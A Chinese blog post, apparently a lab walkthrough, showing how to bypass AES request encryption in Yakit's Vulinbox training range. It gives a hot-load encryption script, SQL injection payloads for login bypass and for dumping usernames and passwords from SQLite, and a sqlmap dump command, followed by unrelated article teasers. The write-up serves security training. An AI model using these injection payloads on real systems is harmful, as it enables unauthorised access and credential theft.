渗透测试-前后端加密分析之AES加密下的SQL注入-编程知识

渗透测试-前后端加密分析之AES加密下的SQL注入

news/2025/3/11 9:01:06/文章来源:https://www.cnblogs.com/CVE-Lemon/p/18622334

本文是高级前端加解密与验签实战的第9篇文章，也是最后一篇文章。本系列文章实验靶场为Yakit里自带的Vulinbox靶场，本文讲述的是绕过前后端加密进行SQL注入。

encryptAES = (packet) => {body = poc.GetHTTPPacketBody(packet)// 生成随机key和ivkey =  randstr(16)iv = randstr(12)// 加密数据data = codec.AESCBCEncrypt(key /*type: []byte*/, body, iv /*type: []byte*/)~data = codec.EncodeBase64(data)// 获取key和iv的hex值hexKey = codec.EncodeToHex(key)hexIV = codec.EncodeToHex(iv)// 构造新的bodybody = f`{"key": "${hexKey}","iv": "${hexIV}","message": "${data}"}`return poc.ReplaceBody(packet, body, false)
}decryptAES = (packet) => {body = poc.GetHTTPPacketBody(packet)body = json.loads(body)key = codec.DecodeHex(body.key)~iv = codec.DecodeHex(body.iv)~data = codec.DecodeBase64(body.message)~data = codec.AESCBCDecrypt(key, data, iv)~return poc.ReplaceBody(packet, data, false)
}beforeRequest = func(req){return encryptAES(req)
}
afterRequest = func(rsp){return decryptAES(rsp)
}

请求体格式

{"username":"admin","password":"password"}

热加载加解密成功

本关提示是SQL注入，所以直接啪一个1=1，说时迟那时快，直接登陆成功

POST /crypto/sqli/aes-ecb/encrypt/login HTTP/1.1
Host: 127.0.0.1:8787
Content-Type: application/json{"username":"admin","password":"password'or 1=1--"}

注入

手工

登陆后看到请求了/crypto/sqli/aes-ecb/encrypt/query/users路径

解密一下请求包：

获取到请求的格式：

{"search":""}

这里是SQLite注入，注入的语句是通过这篇文章获取的：sqlite注入的一点总结 - 先知社区 (aliyun.com)

{"search":"user1'order by 3--"}

{"search":"user1'union select 1,2,3--"}

{"search":"user1'union select 11,22,sql from sqlite_master--"}

{"search":"user1'union select 11,22,sql from sqlite_master where type='table' and name='vulin_users'--"}

{"search":"user1'union select username,password,id from vulin_users--"}

注入成功：

POST /crypto/sqli/aes-ecb/encrypt/query/users HTTP/1.1
Host: 127.0.0.1:8787
Cookie: token=PLNqoZMZfiELLLFuTbmOtSrDdnpFmDDM
Content-Type: application/json
Content-Length: 119{"search":"user1'union select username,password,id from vulin_users--"}

sqlmap

在MITM处加载热加载代码

使用sqlmap注入

python .\sqlmap.py -r .\http.txt --proxy=http://127.0.0.1:8081 --batch -dbms=sqlite -T vulin_users -C username,password,role --dump

http.txt

POST /crypto/sqli/aes-ecb/encrypt/query/users HTTP/1.1
Host: 127.0.0.1:8787
Cookie: token=PLNqoZMZfiELLLFuTbmOtSrDdnpFmDDM
Content-Type: application/json
Content-Length: 119{"search":"*"}

效果：

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/856889.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

Transformers 框架 Pipeline 任务详解（五）：表格问答（table-question-answering）

本文全面介绍了 Transformers 框架中的 table-question-answering 任务，从基础概念到实际应用，再到如何构建和部署一个交互式的表格问答系统。无论是在商业智能、教育辅导还是金融分析等领域，Transformers 框架都能为我们提供强有力的支持，助力我们快速实现高效的表格问答解…

WPF实现加载的动态效果

思路： 1.创建一个画布，长宽100*100；<Canvas Width="100" Height="100">2.画布上创建一个圆，直径25，位于正上方中间，底色浅灰；<Style TargetType="Ellipse"><Setter Property="Width" Value="25"/>…

Derby 数据库介绍(2)--使用

本文主要介绍 Derby 的基本使用(简介可参考:Derby 数据库介绍(1)--简介)，文中所使用到的软件版本：Java 1.8.0_341、Derby 10.14.2.0。 1、嵌入模式直接使用 JDBC 连接数据库，可创建和启动数据库。 1.1、内存数据库@Test public void embeddedMemory() throws SQLException …

视野修炼第114期 | 2024JS现状调查结果

① 2024 JavaScript 现状调查结果 ② Text Fragment - 直接链接网页文本 ③ my-github-2024 - 2024 GitHub 报告生成 ④ 优秀的单页网站案例 ⑤ Gradienty - 一套CSS工具集 ⑥ 并发和并行的区别 ⑦ AI 音效生成欢迎来到第 114 期的【视野修炼 - 技术周刊】，下面是本期的精选内…

线程池工作原理

线程池综述它的主要特点为：线程复用；控制最大并发数；管理线程。使用线程池的好处有第一：降低资源消耗。通过重复利用已创建的线程，降低线程创建和销毁带来的资源消耗第二：提高响应速度。当任务到达时，任务可以不需要等到线程创建好就可以立即执行。第三：提高线程的…

探讨：为什么大公司一定要使用微服务？ | Id | Title | DateAdded | SourceUrl | PostType | Body | BlogId | Description | DateUpdated | IsMarkdown | EntryName | CreatedTime | IsActive | AutoDesc | AccessPermission | | -------------| -------------| -------------…

$实验6 模板类、文件I\O和异常处理$